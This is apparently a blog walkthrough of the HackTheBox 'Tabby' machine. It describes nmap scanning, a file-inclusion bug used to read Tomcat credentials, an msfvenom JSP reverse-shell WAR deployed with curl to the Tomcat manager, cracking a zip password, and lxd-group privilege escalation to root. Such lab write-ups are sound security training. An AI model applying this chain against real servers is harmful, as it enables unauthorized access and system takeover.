# Tabby Walkthrough
Hey folks, Here we come back again to continue **HackTheBox** machines series with “**Tabby**” machine, before we get started let’s take a look at the machine's info
As you can see it’s easy but in my opinion, it should be medium because it has in every step something new and seems to be hard for beginners, let’s get started…
> We will work on it without `Metasploit`
As usual, we will begin our walkthrough with `nmap` scan to get all open ports and service running on them, let’s perform a standard scan
```
nmap -A -T4 10.10.10.194PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
```
We have `22/80/8080` are open and services `apache 2.4.41 / openssh 8.2p1 /apache tomcat` so what we will do ?
1. Try to search for exploits in `apache 2.4.41` by using `searchsploit` tool
2. Try to brute-force `ssh` credentials by using `nmap scripts` and `brutespray` tool
3. Try to brute-force `tomcat` credentials by using `metasploit` and `nmap scirpts`
4. Try to enumerate websites at `10.10.10.194:80` and `10.10.10.194:8080` and content discovery by using `dirbuster/dirsearch/ffuf/gobuster`
Let’s start…
## **Enumeration**
We will try to enumerate the services to get the misconfigurations and vulnerabilities.
### **Public exploitation**
I’ve searched for public exploitation in `exploit-db` and `rapid-7` and public websites for exploitation for `apache 2.4.41 / openssh 8.2p1` but unfortunately nothing we found
For `Tomcat` we found exploitation at `rapid-7` and `exploit-db` but we must know tomcat credentials and the manager path, so we will need it later not now
### **SSH Credentials**
I’ve brute-forced ssh credentials by using `nmap` and `brutespray` but nothing useful!!
### **Tomcat login credentials brute force**
I’ve brute forced the credentials but also nothing useful, we used `metasploit`
Check the method at [Metasploit](https://www.rapid7.com/db/modules/auxiliary/scanner/http/tomcat_mgr_login/)
### **Website Enumeration and content discovery**
At first I will open `10.10.10.194:80`
Nice, we have a website that seems like more websites in real life, and it seems like hosting websites so let’s discover it and check its source code
While checking the source code we found this link `megahosting.htb/news.php?file=statement` so we need to add this domain `megahosting` to the `/etc/hosts` by adding it like this line to the `/etc/hosts` file
`10.10.10.194 megahosting` and then we will access the upper link
let’s search for `megahosting exploit` as Google, it may be affected by custom exploitation.
We have found this one
## Exploitation
Until now we don’t know our version, so let’s try this exploit in the upper link `megahosting.htb/news.php?file=statement`
Good, it’s vulnerable also.
Let’s try to get any information from `tomcat` directories, it may have sensitive information
After some enumeration, I’ve found a bunch of directories in these links
and also search for the `tomcat-users.xml` location file and found it in them, so let’s try to open all of them by using burp intruder or anything else
`/var/share/tomcat9/etc/tomcat-users.xml` is available and has credentials for the `admin-gui and manager-script` so let’s take these credentials and try to upload a reverse payload
Note: one of the privileges of `admin-gui and manager-script` is to deploy files on the server, so we will create a reverse payload and then deploy it
```
reverse shell payload → msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.war
```
```
deploy your payload → curl --upload-file "http://megahosting:8080/manager/deploy/text?path=/shell&update=true"
```
and then you can access it by open `nc ` and access the webpage `megahosting:8080/shell`
So for now we’re into the server but not in the user role, so let’s discover our privileges by opening the uses directories
We can’t open the user directory, so let’s try to get more privileges by searching for any important directories or files
After some enumeration, I found this backup file in `/var/www/html/files`
So I will try to download it on the local machine and look at its content
We will transfer it by opening a server on the vulnerable machine and accessing it from the attack machine
```
Vulnerable machine > python3 -m http.server 80Attack machine > wget http://10.10.10.194:80/backup-file-name
```
Now we have it on our attack machine, let’s try to `unzip` it by `unzip file-name`
It’s protected by a password, so you can use `hashcat or john the wripper` to crack the password, I’ll use `fcrackzip` because it doesn’t take much time
And we have the password `admin@it`
After trying to unzip the file I found nothing useful inside it so let’s use the password in other way
Let’s try to use it to login as `ash` user → `su ash` and insert this password
Good we have more privileges now but not the user privileges so let’s grab the `user.txt` first
Good, for now let’s try to find anything led us to the root access.
If you noticed the `ash` user is in `lxd` group
So after some google searching about how to use this role to be a root user, I’ve found an awesome resource to do it
> Before we follow this resource let’s get first interactive shell because it will not work on the normal shell
```
python -c 'import pty; pty.spawn("/bin/bash")'
```
It will get you in the interactive shell to be manage to access `lxd` then do as this man do exactly
As you will find in the upper link I’ve downloaded the `tar` file and transfer it to the vulnerable machine as you can see
After that, I compiled it on the victim machine and create an image
The final step is to access the image which we create
Let’s get our `root.txt` from the root directory
There’s nothing in this directory
It seems that he’s kidding me :)
Let’s search for the flag in all directories
After some search, I’ve found ❤
